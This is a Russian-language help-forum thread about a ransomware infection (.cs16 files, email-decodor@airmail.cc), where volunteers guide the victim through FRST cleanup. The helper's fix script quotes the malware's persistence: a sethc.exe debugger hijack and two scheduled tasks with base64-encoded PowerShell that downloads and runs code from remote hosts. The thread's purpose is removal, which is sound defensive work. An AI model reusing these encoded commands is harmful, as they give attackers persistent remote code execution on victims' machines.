Решена без расшифровки Расшифровать файлы зашифрованные email-decodor@airmail.cc.ver-CS 1.7.

[Tamzan]

Помогите расшифровать утром сегодня увидели вот такие файлы зашифрованныеemail-decodor@airmail.cc.ver-CS 1.7.id-.fname-README.txt.cs16

 

[Tamzan]

Файлы после сканирования

 

[Tamzan]

Файл с требованиями

 

[Sandor]

Здравствуйте!

Похоже, что шифровалось дважды...

Несколько небольших зашифрованных документов упакуйте в архив и прикрепите к следующему сообщению.
KVRT что-нибудь нашла?
Смените пароль на RDP. Если учётная запись Admin не ваша, удалите её.

• Отключите до перезагрузки антивирус.
• Выделите следующий код:
  

  Start::
  IFEO\sethc.exe: [Debugger] c:\windows\system32\taskmgr.exe
  Task: {ABE42AEF-978F-4069-9785-90BD13573602} - System32\Tasks\Rtsa => powershell -nop -ep bypass -e SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdAAuAHoAZQByADIALgBjAG8AbQAvAG0AcwBvAC4AagBzAHAAJwApAA==
  Task: {E07A91CD-2C53-4AD8-8C4B-CFC0ADA4C53B} - System32\Tasks\Microsoft\windows\Bluetool => powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=
  2019-10-14 20:55 - 2019-10-15 00:08 - 000000806 _____ C:\Users\term4\email-decodor@airmail.cc.ver-CS 1.7.id-.fname-README.txt.cs16
  2019-10-14 20:55 - 2019-10-15 00:08 - 000000806 _____ C:\Users\term4\Downloads\email-decodor@airmail.cc.ver-CS 1.7.id-.fname-README.txt.cs16
  2019-10-14 20:55 - 2019-10-15 00:08 - 000000806 _____ C:\Users\term4\Documents\email-decodor@airmail.cc.ver-CS 1.7.id-.fname-README.txt.cs16
  2019-10-14 20:55 - 2019-10-15 00:08 - 000000806 _____ C:\Users\term4\Desktop\email-decodor@airmail.cc.ver-CS 1.7.id-.fname-README.txt.cs16
  2019-10-14 20:55 - 2019-10-15 00:08 - 000000806 _____ C:\Users\term4\AppData\Roaming\email-decodor@airmail.cc.ver-CS 1.7.id-.fname-README.txt.cs16
  2019-10-14 20:55 - 2019-10-15 00:08 - 000000806 _____ C:\Users\term4\AppData\LocalLow\email-decodor@airmail.cc.ver-CS 1.7.id-.fname-README.txt.cs16
  2019-10-14 20:55 - 2019-10-15 00:08 - 000000806 _____ C:\Users\term4\AppData\email-decodor@airmail.cc.ver-CS 1.7.id-.fname-README.txt.cs16
  2019-10-14 20:55 - 2019-10-15 00:08 - 000000092 _____ C:\Users\term4\README.txt
  2019-10-14 20:55 - 2019-10-15 00:08 - 000000092 _____ C:\Users\term4\Downloads\README.txt
  2019-10-14 20:55 - 2019-10-15 00:08 - 000000092 _____ C:\Users\term4\Documents\README.txt
  2019-10-14 20:55 - 2019-10-15 00:08 - 000000092 _____ C:\Users\term4\Desktop\README.txt
  2019-10-14 20:55 - 2019-10-15 00:08 - 000000092 _____ C:\Users\term4\AppData\Roaming\README.txt
  2019-10-14 20:55 - 2019-10-15 00:08 - 000000092 _____ C:\Users\term4\AppData\README.txt
  2019-10-14 20:55 - 2019-10-15 00:08 - 000000092 _____ C:\Users\term4\AppData\LocalLow\README.txt
  2019-10-14 20:55 - 2019-10-14 20:55 - 000000092 _____ C:\Users\term4\AppData\Roaming\Microsoft\Windows\Start Menu\README.txt
  2019-10-14 20:54 - 2019-10-15 00:05 - 000000806 _____ C:\Users\term4\AppData\Local\Temp\email-decodor@airmail.cc.ver-CS 1.7.id-.fname-README.txt.cs16
  2019-10-14 20:54 - 2019-10-15 00:05 - 000000092 _____ C:\Users\term4\AppData\Local\Temp\README.txt
  2019-10-14 20:53 - 2019-10-15 00:04 - 000000806 _____ C:\Users\Все пользователи\Documents\README.txt
  2019-10-14 20:53 - 2019-10-15 00:04 - 000000806 _____ C:\Users\Public\email-decodor@airmail.cc.ver-CS 1.7.id-.fname-README.txt.cs16
  2019-10-14 20:53 - 2019-10-15 00:04 - 000000806 _____ C:\Users\Public\Downloads\email-decodor@airmail.cc.ver-CS 1.7.id-.fname-README.txt.cs16
  2019-10-14 20:53 - 2019-10-15 00:04 - 000000806 _____ C:\Users\Public\Documents\README.txt
  2019-10-14 20:53 - 2019-10-15 00:04 - 000000806 _____ C:\ProgramData\Documents\README.txt
  2019-10-14 20:53 - 2019-10-15 00:04 - 000000092 _____ C:\Users\Public\README.txt
  2019-10-14 20:53 - 2019-10-15 00:04 - 000000092 _____ C:\Users\Public\Downloads\README.txt
  2019-10-14 20:50 - 2019-10-14 20:51 - 000000806 _____ C:\Users\Все пользователи\email-decodor@airmail.cc.ver-CS 1.7.id-.fname-README.txt.cs16
  2019-10-14 20:50 - 2019-10-14 20:51 - 000000806 _____ C:\Users\Все пользователи\Documents\email-decodor@airmail.cc.ver-CS 1.7.id-.fname-README.txt.cs16
  2019-10-14 20:50 - 2019-10-14 20:51 - 000000806 _____ C:\Users\Public\Documents\email-decodor@airmail.cc.ver-CS 1.7.id-.fname-README.txt.cs16
  2019-10-14 20:50 - 2019-10-14 20:51 - 000000806 _____ C:\ProgramData\email-decodor@airmail.cc.ver-CS 1.7.id-.fname-README.txt.cs16
  2019-10-14 20:50 - 2019-10-14 20:51 - 000000806 _____ C:\ProgramData\Documents\email-decodor@airmail.cc.ver-CS 1.7.id-.fname-README.txt.cs16
  2019-10-14 20:50 - 2019-10-14 20:51 - 000000092 _____ C:\Users\Все пользователи\README.txt
  2019-10-14 20:50 - 2019-10-14 20:51 - 000000092 _____ C:\ProgramData\README.txt
  End::

• Скопируйте выделенный текст (правой кнопкой - Копировать).
• Запустите FRST (FRST64) от имени администратора.
• Нажмите Fix один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.

Перезагрузите компьютер вручную.

Подробнее читайте в этом руководстве.

 

[Tamzan]

Вот файл
Kvrt нашла несколько файлов удалила их, но файлы были созданы от августа месяца я не думаю что это вирус.

 

[Tamzan]

Fixlog

 

[Sandor]

Файлы FRST.txt и Addition.txt удалите и соберите новые.
По возможности расшифровки дождитесь ответа @thyrex

 

[Tamzan]

Хорошо сейчас сделаю.

 

[Tamzan]

ВОТ

 

[thyrex]

Без тела шифратора сказать что-то опредленное невозможно.

 

[Sandor]

@Tamzan,

KVRT что-нибудь нашла?

Если да, упакуйте в архив папку

C:\KVRT_Data\Reports

и прикрепите к следующему сообщению.

 

[Tamzan]

REports

 

[thyrex]

Ничего полезного в отчете.